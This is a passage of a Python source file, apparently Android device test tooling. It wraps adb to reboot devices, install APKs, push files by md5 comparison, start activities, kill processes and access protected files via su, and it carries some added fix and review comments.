    self._adb.SendCommand('wait-for-device')
    return return_value
def GetDeviceYear(self):
  """Returns the year information of the date on device."""
  # 'date +%Y' prints the 4-digit year according to the device clock.
  return self.RunShellCommand('date +%Y')[0]
def GetExternalStorage(self):
  """Returns $EXTERNAL_STORAGE on the device, caching the first lookup."""
  if not self._external_storage:
    storage = self.RunShellCommand('echo $EXTERNAL_STORAGE')[0]
    if not storage:
      raise device_errors.CommandFailedError(
          ['shell', "'echo $EXTERNAL_STORAGE'"],
          'Unable to find $EXTERNAL_STORAGE')
    self._external_storage = storage
  return self._external_storage
def WaitForDevicePm(self, timeout=120):
  """Blocks until the device's package manager is available.

  To workaround http://b/5201039, we restart the shell and retry if the
  package manager isn't back after 120 seconds.

  Raises:
    errors.WaitForResponseTimedOutError after max retries reached.
  """
  last_err = None
  for _ in range(3):
    try:
      self._adb.WaitForDevicePm(wait_time=timeout)
      return  # Success
    except errors.WaitForResponseTimedOutError as e:
      last_err = e
      logging.warning('Restarting and retrying after timeout: %s', e)
      self.RestartShell()
  raise last_err  # Only reached after max retries, re-raise the last error.
def RestartShell(self):
  """Restarts the shell on the device. Does not block for it to return."""
  for runtime_cmd in ('stop', 'start'):
    self.RunShellCommand(runtime_cmd)
def Reboot(self, full_reboot=True):
  """Reboots the device and waits for the package manager to return.

  Args:
    full_reboot: Whether to fully reboot the device or just restart the shell.
  """
  # TODO(torne): hive can't reboot the device either way without breaking the
  if os.environ.get('USING_HIVE'):
    logging.warning('Ignoring reboot request as we are on hive')
    return
  # Without root we cannot restart the shell, so fall back to a full reboot.
  if full_reboot or not self.IsRootEnabled():
    self._adb.SendCommand('reboot')
    # The reboot invalidates the cached property session; start a fresh one.
    self._system_properties = system_properties.SystemProperties(self.Adb())
    timeout = 300
    retries = 1
    # Wait (up to ~10s) for the device to actually drop offline before
    # waiting for it to come back, so we don't return prematurely.
    while retries < 10 and self.IsOnline():
      time.sleep(1)
      retries += 1
  else:
    # stop/start restarts the Android runtime only — faster than a reboot.
    self.RestartShell()
    timeout = 120
  self.WaitForDevicePm(timeout)
  self.WaitForSdCardReady(timeout)
def Shutdown(self):
  """Shuts down the device."""
  # 'reboot -p' powers the device off instead of restarting it.
  self._adb.SendCommand('reboot -p')
  # The old property session is dead once the device powers off.
  self._system_properties = system_properties.SystemProperties(self.Adb())
def Uninstall(self, package):
  """Uninstalls the specified package from the device.

  Args:
    package: Name of the package to remove.

  Returns:
    A status string returned by adb uninstall
  """
  cmd = 'uninstall %s' % package
  self._LogShell(cmd)
  return self._adb.SendCommand(cmd, timeout_time=60)
def Install(self, package_file_path, reinstall=False):
  """Installs the specified package to the device.

  Args:
    package_file_path: Path to .apk file to install.
    reinstall: Reinstall an existing apk, keeping the data.

  Returns:
    A status string returned by adb install
  """
  assert os.path.isfile(package_file_path), ('<%s> is not file' %
                                             package_file_path)
  flags = ['-r'] if reinstall else []
  install_cmd = ' '.join(['install'] + flags + [package_file_path])
  self._LogShell(install_cmd)
  return self._adb.SendCommand(install_cmd,
                               timeout_time=2 * 60,
                               retry_count=0)
def ManagedInstall(self, apk_path, keep_data=False, package_name=None,
                   reboots_on_timeout=2):
  """Installs specified package and reboots device on timeouts.

  If package_name is supplied, checks if the package is already installed and
  doesn't reinstall if the apk md5sums match.

  Args:
    apk_path: Path to .apk file to install.
    keep_data: Reinstalls instead of uninstalling first, preserving the
      application data.
    package_name: Package name (only needed if keep_data=False).
    reboots_on_timeout: number of time to reboot if package manager is frozen.
  """
  # Check if package is already installed and up to date.
  if package_name:
    installed_apk_path = self.GetApplicationPath(package_name)
    if (installed_apk_path and
        not self.GetFilesChanged(apk_path, installed_apk_path,
                                 ignore_filenames=True)):
      logging.info('Skipped install: identical %s APK already installed' %
                   package_name)
      return
  # Install.
  reboots_left = reboots_on_timeout
  while True:
    try:
      if not keep_data:
        assert package_name
        self.Uninstall(package_name)
      install_status = self.Install(apk_path, reinstall=keep_data)
      if 'Success' in install_status:
        return
      else:
        raise Exception('Install failure: %s' % install_status)
    except errors.WaitForResponseTimedOutError:
      # Fix: use the function-call form of print. The Python 2 statement
      # form is a syntax error on Python 3; with a single argument this
      # form behaves identically on both.
      print('@@@STEP_WARNINGS@@@')
      logging.info('Timeout on installing %s on device %s', apk_path,
                   self._device)

      if reboots_left <= 0:
        raise Exception('Install timed out')

      # Force a hard reboot on last attempt
      self.Reboot(full_reboot=(reboots_left == 1))
      reboots_left -= 1
def MakeSystemFolderWritable(self):
  """Remounts the /system folder rw."""
  remount_output = self._adb.SendCommand('remount')
  if remount_output.strip() == 'remount succeeded':
    return
  raise errors.MsgException('Remount failed: %s' % remount_output)
def RestartAdbdOnDevice(self):
  """Restarts adbd on the device via restart_adbd.sh, then blocks until the
  device is reachable again."""
  logging.info('Restarting adbd on the device...')
  # The script is pushed to a device temp file and sourced in the shell;
  # wait-for-device then blocks until adbd is back.
  with DeviceTempFile(self, suffix=".sh") as temp_script_file:
    host_script_path = os.path.join(constants.DIR_SOURCE_ROOT,
                                    'build',
                                    'android',
                                    'pylib',
                                    'restart_adbd.sh')
    self._adb.Push(host_script_path, temp_script_file.name)
    self.RunShellCommand('. %s' % temp_script_file.name)
    self._adb.SendCommand('wait-for-device')
def RestartAdbServer(self):
  """Restart the adb server."""
  kill_status = self.KillAdbServer()
  if kill_status != 0:
    raise errors.MsgException('KillAdbServer: %d' % kill_status)

  start_status = self.StartAdbServer()
  if start_status != 0:
    raise errors.MsgException('StartAdbServer: %d' % start_status)
@staticmethod
def KillAdbServer():
  """Kill adb server.

  Returns:
    0 once no adb process remains, non-zero if adb is still alive after
    all retries.
  """
  adb_cmd = [constants.GetAdbPath(), 'kill-server']
  ret = cmd_helper.RunCmd(adb_cmd)
  retry = 0
  # Poll (with linearly increasing sleeps) until no adb process remains.
  while retry < 3:
    ret, _ = cmd_helper.GetCmdStatusAndOutput(['pgrep', 'adb'])
    if ret != 0:
      # pgrep didn't find adb, kill-server succeeded.
      return 0
    retry += 1
    time.sleep(retry)
  # Bug fix: adb was still alive after every retry. pgrep's status is 0
  # here ("process found"), so returning it would falsely signal success
  # to callers such as RestartAdbServer; report failure explicitly.
  return 1
def StartAdbServer(self):
  """Start adb server."""
  # taskset pins the server to CPU 0; the rest of the command starts it.
  adb_cmd = ['taskset', '-c', '0', constants.GetAdbPath(), 'start-server']
  ret, _ = cmd_helper.GetCmdStatusAndOutput(adb_cmd)
  retry = 0
  # Poll (with increasing sleeps) until an adb process is visible.
  while retry < 3:
    ret, _ = cmd_helper.GetCmdStatusAndOutput(['pgrep', 'adb'])
    if ret == 0:
      # adb server is running; block until the device is reachable.
      self._adb.SendCommand('wait-for-device')
      return 0
    retry += 1
    time.sleep(retry)
  # Non-zero pgrep status: the server never came up.
  return ret
def WaitForSystemBootCompleted(self, wait_time):
  """Waits for targeted system's boot_completed flag to be set.

  Args:
    wait_time: time in seconds to wait

  Raises:
    WaitForResponseTimedOutError if wait_time elapses and flag still not
      set.
  """
  logging.info('Waiting for system boot completed...')
  self._adb.SendCommand('wait-for-device')
  # Now the device is there, but system not boot completed.
  # Query the sys.boot_completed flag with a basic command
  boot_completed = False
  attempts = 0
  wait_period = 5
  # Poll every |wait_period| seconds until the flag is '1' or we run out
  # of |wait_time|.
  while not boot_completed and (attempts * wait_period) < wait_time:
    output = self.system_properties['sys.boot_completed']
    output = output.strip()
    if output == '1':
      boot_completed = True
    else:
      # If 'error: xxx' returned when querying the flag, it means
      # adb server lost the connection to the emulator, so restart the adb
      # server.
      if 'error:' in output:
        self.RestartAdbServer()
      time.sleep(wait_period)
      attempts += 1
  if not boot_completed:
    raise errors.WaitForResponseTimedOutError(
        'sys.boot_completed flag was not set after %s seconds' % wait_time)
def WaitForSdCardReady(self, timeout_time):
  """Wait for the SD card ready before pushing data into it."""
  logging.info('Waiting for SD card ready...')
  external_storage = self.GetExternalStorage()
  wait_period = 5
  attempts = 0
  # Probe with 'ls' every |wait_period| seconds until it lists anything.
  while attempts * wait_period < timeout_time:
    if self.RunShellCommand('ls ' + external_storage):
      return
    time.sleep(wait_period)
    attempts += 1
  raise errors.WaitForResponseTimedOutError(
      'SD card not ready after %s seconds' % timeout_time)
def GetAndroidToolStatusAndOutput(self, command, lib_path=None, *args, **kw):
  """Runs a native Android binary, wrapping the command as necessary.

  This is a specialization of GetShellCommandStatusAndOutput, which is meant
  for running tools/android/ binaries and handle properly: (1) setting the
  lib path (for component=shared_library), (2) using the PIE wrapper on ICS.
  See crbug.com/373219 for more context.

  Args:
    command: String containing the command to send.
    lib_path: (optional) path to the folder containing the dependent libs.
    Same other arguments of GetCmdStatusAndOutput.
  """
  # The first time this command is run the device is inspected to check
  # whether a wrapper for running PIE executable is needed (only Android ICS)
  # or not. The results is cached, so the wrapper is pushed only once.
  if self._pie_wrapper is None:
    # None: did not check; '': did check and not needed; '/path': use /path.
    self._pie_wrapper = ''
    if self.GetBuildId().startswith('I'):  # Ixxxx = Android ICS.
      run_pie_dist_path = os.path.join(constants.GetOutDirectory(), 'run_pie')
      assert os.path.exists(run_pie_dist_path), 'Please build run_pie'
      # The PIE loader must be pushed manually (i.e. no PushIfNeeded) because
      # PushIfNeeded requires md5sum and md5sum requires the wrapper as well.
      adb_command = 'push %s %s' % (run_pie_dist_path, PIE_WRAPPER_PATH)
      assert _HasAdbPushSucceeded(self._adb.SendCommand(adb_command))
      self._pie_wrapper = PIE_WRAPPER_PATH

  # Prefix the wrapper and/or LD_LIBRARY_PATH only when needed.
  if self._pie_wrapper:
    command = '%s %s' % (self._pie_wrapper, command)
  if lib_path:
    command = 'LD_LIBRARY_PATH=%s %s' % (lib_path, command)
  return self.GetShellCommandStatusAndOutput(command, *args, **kw)
# It is tempting to turn this function into a generator, however this is not
# possible without using a private (local) adb_shell instance (to ensure no
# other command interleaves usage of it), which would defeat the main aim of
# being able to reuse the adb shell instance across commands.
def RunShellCommand(self, command, timeout_time=20, log_result=False):
  """Send a command to the adb shell and return the result.

  Args:
    command: String containing the shell command to send.
    timeout_time: Number of seconds to wait for command to respond before
      retrying, used by AdbInterface.SendShellCommand.
    log_result: Boolean to indicate whether we should log the result of the
      shell command.

  Returns:
    list containing the lines of output received from running the command
  """
  self._LogShell(command)
  if "'" in command:
    # Escape embedded single quotes for the single-quoted wrapper below.
    command = command.replace("'", "'\\''")
  raw_output = self._adb.SendShellCommand("'%s'" % command, timeout_time)
  result = [line for line in raw_output.splitlines()
            if not line.startswith('WARNING')]
  if result == ['error: device not found']:
    raise errors.DeviceUnresponsiveError('device not found')
  if log_result:
    self._LogShell('\n'.join(result))
  return result
def GetShellCommandStatusAndOutput(self, command, timeout_time=20,
                                   log_result=False):
  """See RunShellCommand() above.

  Returns:
    The tuple (exit code, list of output lines).
  """
  # Append 'echo %$?' so the exit status rides along on the last line.
  lines = self.RunShellCommand(
      command + '; echo %$?', timeout_time, log_result)
  last_line = lines[-1]
  status_pos = last_line.rfind('%')
  assert status_pos >= 0
  status = int(last_line[status_pos + 1:])
  if status_pos == 0:
    return (status, lines[:-1])
  return (status, lines[:-1] + [last_line[:status_pos]])
def KillAll(self, process, signum=9, with_su=False):
  """Android version of killall, connected via adb.

  Args:
    process: name of the process to kill off.
    signum: signal to use, 9 (SIGKILL) by default.
    with_su: wether or not to use su to kill the processes.

  Returns:
    the number of processes killed
  """
  pids = self.ExtractPid(process)
  if pids:
    kill_cmd = 'kill -%d %s' % (signum, ' '.join(pids))
    runner = self.RunShellCommandWithSU if with_su else self.RunShellCommand
    runner(kill_cmd)
  return len(pids)
def KillAllBlocking(self, process, timeout_sec, signum=9, with_su=False):
  """Blocking version of killall, connected via adb.

  This waits until no process matching the corresponding name appears in ps'
  output anymore.

  Args:
    process: name of the process to kill off
    timeout_sec: the timeout in seconds
    signum: same as |KillAll|
    with_su: same as |KillAll|

  Returns:
    the number of processes killed
  """
  processes_killed = self.KillAll(process, signum=signum, with_su=with_su)
  if processes_killed:
    elapsed = 0
    wait_period = 0.1
    # Note that this doesn't take into account the time spent in ExtractPid().
    while self.ExtractPid(process) and elapsed < timeout_sec:
      time.sleep(wait_period)
      elapsed += wait_period
    if elapsed >= timeout_sec:
      # Bug fix: ExtractPid() returns a *list* of pid strings; subtracting
      # the list itself from an int raised TypeError. Subtract its length
      # to report how many processes actually died.
      return processes_killed - len(self.ExtractPid(process))
  return processes_killed
@staticmethod
def _GetActivityCommand(package, activity, wait_for_completion, action,
                        category, data, extras, trace_file_name, force_stop,
                        flags):
  """Creates command to start |package|'s activity on the device.

  Args - as for StartActivity

  Returns:
    the command to run on the target to start the activity
  """
  parts = ['am start -a %s' % action]
  if force_stop:
    parts.append('-S')
  if wait_for_completion:
    parts.append('-W')
  if category:
    parts.append('-c %s' % category)
  if package and activity:
    parts.append('-n %s/%s' % (package, activity))
  if data:
    parts.append('-d "%s"' % data)
  if extras:
    for key in extras:
      value = extras[key]
      # Pick the 'am' extra flag matching the value's type. bool must be
      # tested before int since bool is an int subclass.
      if isinstance(value, str):
        extra_flag = '--es'
      elif isinstance(value, bool):
        extra_flag = '--ez'
      elif isinstance(value, int):
        extra_flag = '--ei'
      else:
        raise NotImplementedError(
            'Need to teach StartActivity how to pass %s extras' % type(value))
      parts.append('%s %s %s' % (extra_flag, key, value))
  if trace_file_name:
    parts.append('--start-profiler ' + trace_file_name)
  if flags:
    parts.append('-f %s' % flags)
  return ' '.join(parts)
def StartActivity(self, package, activity, wait_for_completion=False,
                  action='android.intent.action.VIEW',
                  category=None, data=None,
                  extras=None, trace_file_name=None,
                  force_stop=False, flags=None):
  """Starts |package|'s activity on the device.

  Args:
    package: Name of package to start (e.g. 'com.google.android.apps.chrome').
    activity: Name of activity (e.g. '.Main' or
      'com.google.android.apps.chrome.Main').
    wait_for_completion: wait for the activity to finish launching (-W flag).
    action: string (e.g. "android.intent.action.MAIN"). Default is VIEW.
    category: string (e.g. "android.intent.category.HOME")
    data: Data string to pass to activity (e.g. 'http://www.example.com/').
    extras: Dict of extras to pass to activity. Values are significant.
    trace_file_name: If used, turns on and saves the trace to this file name.
    force_stop: force stop the target app before starting the activity (-S
      flag).

  Returns:
    The output of the underlying command as a list of lines.
  """
  return self.RunShellCommand(
      self._GetActivityCommand(package, activity, wait_for_completion,
                               action, category, data, extras,
                               trace_file_name, force_stop, flags))
def StartActivityTimed(self, package, activity, wait_for_completion=False,
                       action='android.intent.action.VIEW',
                       category=None, data=None,
                       extras=None, trace_file_name=None,
                       force_stop=False, flags=None):
  """Starts |package|'s activity on the device, returning the start time

  Args - as for StartActivity

  Returns:
    A tuple containing:
      - the output of the underlying command as a list of lines, and
      - a timestamp string for the time at which the activity started
  """
  cmd = self._GetActivityCommand(package, activity, wait_for_completion,
                                 action, category, data, extras,
                                 trace_file_name, force_stop, flags)
  self.StartMonitoringLogcat()
  # Emit a 'starting activity' logcat marker right before the am command so
  # the matched log line's timestamp approximates the activity start time.
  out = self.RunShellCommand('log starting activity; ' + cmd)
  activity_started_re = re.compile('.*starting activity.*')
  m = self.WaitForLogMatch(activity_started_re, None)
  assert m
  start_line = m.group(0)
  return (out, GetLogTimestamp(start_line, self.GetDeviceYear()))
def StartCrashUploadService(self, package):
  """Starts |package|'s MinidumpUploadService as root and sleeps 15s."""
  # TODO(frankf): We really need a python wrapper around Intent
  # to be shared with StartActivity/BroadcastIntent.
  cmd = (
      'am startservice -a %s.crash.ACTION_FIND_ALL -n '
      '%s/%s.crash.MinidumpUploadService' %
      (constants.PACKAGE_INFO['chrome'].package,
       package,
       constants.PACKAGE_INFO['chrome'].package))
  am_output = self.RunShellCommandWithSU(cmd)
  assert am_output and 'Starting' in am_output[-1], (
      'Service failed to start: %s' % am_output)
  # NOTE(review): fixed 15s delay, presumably to let the service finish its
  # work before callers proceed — the exact value is unexplained; confirm.
  time.sleep(15)
def BroadcastIntent(self, package, intent, *args):
  """Send a broadcast intent.

  Args:
    package: Name of package containing the intent.
    intent: Name of the intent.
    args: Optional extra arguments for the intent.
  """
  extra_args = ' '.join(args)
  self.RunShellCommand(
      'am broadcast -a %s.%s %s' % (package, intent, extra_args))
def GoHome(self):
  """Tell the device to return to the home screen. Blocks until completion."""
  home_cmd = ('am start -W -a android.intent.action.MAIN '
              '-c android.intent.category.HOME')
  self.RunShellCommand(home_cmd)
def CloseApplication(self, package):
  """Attempt to close down the application, using increasing violence.

  Args:
    package: Name of the process to kill off, e.g.
      com.google.android.apps.chrome
  """
  self.RunShellCommand('am force-stop %s' % package)
def GetApplicationPath(self, package):
  """Get the installed apk path on the device for the given package.

  Args:
    package: Name of the package.

  Returns:
    Path to the apk on the device if it exists, None otherwise.
  """
  # 'pm path' prints "package:/path/to/foo.apk" iff the package exists.
  pm_path_output = self.RunShellCommand('pm path ' + package)
  if not pm_path_output:
    return None
  return pm_path_output[0].split(':')[1]
def ClearApplicationState(self, package):
  """Closes and clears all state for the given |package|."""
  # 'pm clear' on a nonexistent package may never return, so verify that
  # the package exists first via 'pm path'.
  if self.RunShellCommand('pm path ' + package):
    self.RunShellCommand('pm clear ' + package)
def SendKeyEvent(self, keycode):
  """Sends keycode to the device.

  Args:
    keycode: Numeric keycode to send (see "enum" at top of file).
  """
  key_cmd = 'input keyevent %d' % keycode
  self.RunShellCommand(key_cmd)
def _RunMd5Sum(self, host_path, device_path):
  """Gets the md5sum of a host path and device path.

  Args:
    host_path: Path (file or directory) on the host.
    device_path: Path on the device.

  Returns:
    A tuple containing lists of the host and device md5sum results as
    created by _ParseMd5SumOutput().
  """
  md5sum_dist_path = os.path.join(constants.GetOutDirectory(),
                                  'md5sum_dist')
  assert os.path.exists(md5sum_dist_path), 'Please build md5sum.'
  md5sum_dist_mtime = os.stat(md5sum_dist_path).st_mtime
  # Push the device-side md5sum binary at most once per binary mtime.
  if (md5sum_dist_path not in self._push_if_needed_cache or
      self._push_if_needed_cache[md5sum_dist_path] != md5sum_dist_mtime):
    command = 'push %s %s' % (md5sum_dist_path, MD5SUM_DEVICE_FOLDER)
    assert _HasAdbPushSucceeded(self._adb.SendCommand(command))
    self._push_if_needed_cache[md5sum_dist_path] = md5sum_dist_mtime

  # Hash the device side with the pushed binary...
  (_, md5_device_output) = self.GetAndroidToolStatusAndOutput(
      self._util_wrapper + ' ' + MD5SUM_DEVICE_PATH + ' ' + device_path,
      lib_path=MD5SUM_DEVICE_FOLDER,
      timeout_time=2 * 60)
  device_hash_tuples = _ParseMd5SumOutput(md5_device_output)

  # ...and the host side with the host-built binary.
  assert os.path.exists(host_path), 'Local path not found %s' % host_path
  md5sum_output = cmd_helper.GetCmdOutput(
      [os.path.join(constants.GetOutDirectory(), 'md5sum_bin_host'),
       host_path])
  host_hash_tuples = _ParseMd5SumOutput(md5sum_output.splitlines())
  return (host_hash_tuples, device_hash_tuples)
def GetFilesChanged(self, host_path, device_path, ignore_filenames=False):
  """Compares the md5sum of a host path against a device path.

  Note: Ignores extra files on the device.

  Args:
    host_path: Path (file or directory) on the host.
    device_path: Path on the device.
    ignore_filenames: If True only the file contents are considered when
      checking whether a file has changed, otherwise the relative path
      must also match.

  Returns:
    A list of tuples of the form (host_path, device_path) for files whose
    md5sums do not match.
  """
  # Resolve symlinks on both ends so the relative paths computed below are
  # consistent with the absolute paths md5sum reports.
  real_host_path = os.path.realpath(host_path)
  real_device_path = self.RunShellCommand('realpath "%s"' % device_path)[0]

  host_hash_tuples, device_hash_tuples = self._RunMd5Sum(
      real_host_path, real_device_path)

  if len(host_hash_tuples) > len(device_hash_tuples):
    logging.info('%s files do not exist on the device' %
                 (len(host_hash_tuples) - len(device_hash_tuples)))

  # (relative path, hash) for every host file.
  host_rel = [(os.path.relpath(os.path.normpath(t.path), real_host_path),
               t.hash)
              for t in host_hash_tuples]

  if os.path.isdir(real_host_path):
    def RelToRealPaths(rel_path):
      return (os.path.join(real_host_path, rel_path),
              os.path.join(real_device_path, rel_path))
  else:
    # Single-file case: there is exactly one relative entry.
    assert len(host_rel) == 1

    def RelToRealPaths(_):
      return (real_host_path, real_device_path)

  if ignore_filenames:
    # Content-only comparison: unchanged if any device file shares the hash.
    device_hashes = set([h.hash for h in device_hash_tuples])
    ShouldPush = lambda p, h: h not in device_hashes
  else:
    # Both the relative path and the hash must match to skip the push.
    device_rel = dict([(os.path.relpath(os.path.normpath(t.path),
                                        real_device_path),
                        t.hash)
                       for t in device_hash_tuples])
    ShouldPush = lambda p, h: p not in device_rel or h != device_rel[p]

  return [RelToRealPaths(path) for path, host_hash in host_rel
          if ShouldPush(path, host_hash)]
def PushIfNeeded(self, host_path, device_path):
  """Pushes |host_path| to |device_path|.

  Works for files and directories. This method skips copying any paths in
  |test_data_paths| that already exist on the device with the same hash.

  All pushed files can be removed by calling RemovePushedFiles().
  """
  # Above this many changed files a single bulk push is used instead of
  # per-file pushes.
  MAX_INDIVIDUAL_PUSHES = 50
  if not os.path.exists(host_path):
    raise device_errors.CommandFailedError(
        'Local path not found %s' % host_path, device=str(self))

  # on the device don't modify the files.
  if not os.path.isdir(host_path):
    # mtime cache: if the single file is unchanged since the last push from
    # this process, skip the (expensive) md5 comparison and push entirely.
    if host_path in self._push_if_needed_cache:
      host_path_mtime = self._push_if_needed_cache[host_path]
      if host_path_mtime == os.stat(host_path).st_mtime:
        return

  size = host_utils.GetRecursiveDiskUsage(host_path)
  self._pushed_files.append(device_path)
  self._potential_push_size += size

  if os.path.isdir(host_path):
    self.RunShellCommand('mkdir -p "%s"' % device_path)

  changed_files = self.GetFilesChanged(host_path, device_path)
  logging.info('Found %d files that need to be pushed to %s',
               len(changed_files), device_path)
  if not changed_files:
    return

  def Push(host, device):
    # of 60 seconds which isn't sufficient for a lot of users of this method.
    push_command = 'push %s %s' % (host, device)
    self._LogShell(push_command)

    # Retry the push (with linear backoff) since adb pushes can be flaky.
    retry = 0
    while True:
      output = self._adb.SendCommand(push_command, timeout_time=30 * 60)
      if _HasAdbPushSucceeded(output):
        if not os.path.isdir(host_path):
          # Record the mtime so the next PushIfNeeded can early-out.
          self._push_if_needed_cache[host] = os.stat(host).st_mtime
        return
      if retry < 3:
        retry += 1
        wait_time = 5 * retry
        logging.error('Push failed, retrying in %d seconds: %s' %
                      (wait_time, output))
        time.sleep(wait_time)
      else:
        raise Exception('Push failed: %s' % output)

  diff_size = 0
  if len(changed_files) <= MAX_INDIVIDUAL_PUSHES:
    diff_size = sum(host_utils.GetRecursiveDiskUsage(f[0])
                    for f in changed_files)

  # Push the whole tree in one go when there are many changed files or the
  # changed subset is more than half the total size; otherwise push files
  # individually.
  if len(changed_files) > MAX_INDIVIDUAL_PUSHES or diff_size > 0.5 * size:
    self._actual_push_size += size
    Push(host_path, device_path)
  else:
    for f in changed_files:
      Push(f[0], f[1])
    self._actual_push_size += diff_size
def GetPushSizeInfo(self):
  """Get total size of pushes to the device done via PushIfNeeded()

  Returns:
    A tuple:
      1. Total size of push requests to PushIfNeeded (MB)
      2. Total size that was actually pushed (MB)
  """
  # Both counters are accumulated by PushIfNeeded().
  return self._potential_push_size, self._actual_push_size
def GetFileContents(self, filename, log_result=False):
  """Gets contents from the file specified by |filename|."""
  cat_cmd = 'cat "%s" 2>/dev/null' % filename
  return self.RunShellCommand(cat_cmd, log_result=log_result)
def SetFileContents(self, filename, contents):
  """Writes |contents| to the file specified by |filename|."""
  # Stage the contents in a host temp file, then push it to the device.
  with tempfile.NamedTemporaryFile() as staging:
    staging.write(contents)
    staging.flush()
    self._adb.Push(staging.name, filename)
def RunShellCommandWithSU(self, command, timeout_time=20, log_result=False):
  """Runs |command| on the device as root via 'su -c'."""
  su_command = 'su -c %s' % command
  return self.RunShellCommand(su_command, timeout_time, log_result)
def CanAccessProtectedFileContents(self):
  """Returns True if Get/SetProtectedFileContents would work via "su" or adb
  shell running as root.

  Devices running user builds don't have adb root, but may provide "su" which
  can be used for accessing protected files.
  """
  # Idiom fix: identity comparison with None ('is not None' over '!= None').
  return self._GetProtectedFileCommandRunner() is not None
def _GetProtectedFileCommandRunner(self):
  """Finds the best method to access protected files on the device.

  Returns:
    1. None when privileged files cannot be accessed on the device.
    2. Otherwise: A function taking a single parameter: a string with command
       line arguments. Running that function executes the command with
       the appropriate method.
  """
  # Cached: the probe below only runs once per object lifetime.
  if self._protected_file_access_method_initialized:
    return self._privileged_command_runner

  self._privileged_command_runner = None
  self._protected_file_access_method_initialized = True

  # Try a plain shell first (adb running as root), then fall back to 'su'.
  for cmd in [self.RunShellCommand, self.RunShellCommandWithSU]:
    # Get contents of the auxv vector for the init(8) process from a small
    # binary file that always exists on linux and is always read-protected.
    contents = cmd('cat /proc/1/auxv')
    # The leading 4 or 8-bytes of auxv vector is a_type. There are not many
    # reserved a_type values, hence byte 2 must always be '\0' for a realistic
    # auxv. See /usr/include/elf.h.
    if len(contents) > 0 and (contents[0][2] == '\0'):
      self._privileged_command_runner = cmd
      break
  return self._privileged_command_runner
def GetProtectedFileContents(self, filename):
  """Gets contents from the protected file specified by |filename|.

  This is potentially less efficient than GetFileContents.
  """
  command_runner = self._GetProtectedFileCommandRunner()
  if command_runner:
    return command_runner('cat "%s" 2> /dev/null' % filename)
  logging.warning('Could not access protected file: %s' % filename)
  return []
def SetProtectedFileContents(self, filename, contents):
  """Writes |contents| to the protected file specified by |filename|.

  This is less efficient than SetFileContents.
  """
  # The contents go to an unprivileged device temp file first; a small
  # privileged 'cat' script then copies them to the protected destination.
  with DeviceTempFile(self) as temp_file:
    with DeviceTempFile(self, suffix=".sh") as temp_script:
      # Put the contents in a temporary file
      self.SetFileContents(temp_file.name, contents)
      # Create a script to copy the file contents to its final destination
      self.SetFileContents(temp_script.name,
                           'cat %s > %s' % (temp_file.name, filename))

      command = 'sh %s' % temp_script.name
      command_runner = self._GetProtectedFileCommandRunner()
      if command_runner:
        return command_runner(command)
      else:
        # Best-effort: log and fall through (returns None) when no
        # privileged access method is available.
        logging.warning(
            'Could not set contents of protected file: %s' % filename)
def RemovePushedFiles(self):
  """Removes all files pushed with PushIfNeeded() from the device."""
  for pushed_path in self._pushed_files:
    self.RunShellCommand('rm -r %s' % pushed_path, timeout_time=2 * 60)
def ListPathContents(self, path):
  """Lists files in all subdirectories of |path|.

  Args:
    path: The path to list.

  Returns:
    A dict of {"name": (size, lastmod), ...}.
  """
  # Example output:
  # /foo/bar:
  # -rw-r----- user group 102 2011-05-12 12:29:54.131623387 +0100 baz.txt
  # Fix: raw strings for the regex — non-raw '\s' is an invalid string
  # escape (a DeprecationWarning on Python 3). The pattern is unchanged.
  re_file = re.compile(r'^-(?P<perms>[^\s]+)\s+'
                       r'(?P<user>[^\s]+)\s+'
                       r'(?P<group>[^\s]+)\s+'
                       r'(?P<size>[^\s]+)\s+'
                       r'(?P<date>[^\s]+)\s+'
                       r'(?P<time>[^\s]+)\s+'
                       r'(?P<filename>[^\s]+)$')
  return _GetFilesFromRecursiveLsOutput(
      path, self.RunShellCommand('ls -lR %s' % path), re_file,
      self.GetUtcOffset())
def GetUtcOffset(self):
  """Returns the device's UTC offset string, cached after the first query."""
  if not self._device_utc_offset:
    offset_lines = self.RunShellCommand('date +%z')
    self._device_utc_offset = offset_lines[0]
  return self._device_utc_offset
def SetJavaAssertsEnabled(self, enable):
  """Sets or removes the device java assertions property.

  Args:
    enable: If True the property will be set.

  Returns:
    True if the file was modified (reboot is required for it to take effect).
  """
  # First ensure the desired property is persisted.
  temp_props_file = tempfile.NamedTemporaryFile()
  properties = ''
  if self._adb.Pull(LOCAL_PROPERTIES_PATH, temp_props_file.name):
    with open(temp_props_file.name) as props_in:
      properties = props_in.read()
  re_search = re.compile(r'^\s*' + re.escape(JAVA_ASSERT_PROPERTY) +
                         r'\s*=\s*all\s*$', re.MULTILINE)
  if enable != bool(re.search(re_search, properties)):
    re_replace = re.compile(r'^\s*' + re.escape(JAVA_ASSERT_PROPERTY) +
                            r'\s*=\s*\w+\s*$', re.MULTILINE)
    properties = re.sub(re_replace, '', properties)
    if enable:
      properties += '\n%s=all\n' % JAVA_ASSERT_PROPERTY
    # Fix: use open() in a with-block. The file() builtin does not exist on
    # Python 3, and the original expression leaked the file handle.
    with open(temp_props_file.name, 'w') as props_out:
      props_out.write(properties)
    self._adb.Push(temp_props_file.name, LOCAL_PROPERTIES_PATH)

  # Next, check the current runtime value is what we need, and
  # if not, set it and report that a reboot is required.
  was_set = 'all' in self.system_properties[JAVA_ASSERT_PROPERTY]
  if was_set == enable:
    return False
  self.system_properties[JAVA_ASSERT_PROPERTY] = enable and 'all' or ''
  return True
def GetBuildId(self):
  """Returns the build ID of the system (e.g. JRM79C)."""
  value = self.system_properties['ro.build.id']
  assert value
  return value
def GetBuildType(self):
  """Returns the build type of the system (e.g. eng)."""
  value = self.system_properties['ro.build.type']
  assert value
  return value
def GetBuildProduct(self):
  """Returns the build product of the device (e.g. maguro)."""
  value = self.system_properties['ro.build.product']
  assert value
  return value
def GetProductName(self):
  """Returns the product name of the device (e.g. takju)."""
  value = self.system_properties['ro.product.name']
  assert value
  return value
def GetBuildFingerprint(self):
  """Returns the build fingerprint of the device."""
  value = self.system_properties['ro.build.fingerprint']
  assert value
  return value
def GetDescription(self):
  """Returns the description of the system.

  For example, "yakju-userdebug 4.1 JRN54F 364167 dev-keys".
  """
  value = self.system_properties['ro.build.description']
  assert value
  return value
def GetProductModel(self):
  """Returns the name of the product model (e.g. "Galaxy Nexus") """
  value = self.system_properties['ro.product.model']
  assert value
  return value
def GetWifiIP(self):
  """Returns the wifi IP on the device."""
  # Deliberately no assert: devices (e.g. emulators) may not have a wifi IP.
  return self.system_properties['dhcp.wlan0.ipaddress']
def GetSubscriberInfo(self):
  """Returns the device subscriber info (e.g. GSM and device ID) as string."""
  # Deliberately no assert: devices (e.g. Nakasi on K) may lack iphonesubinfo.
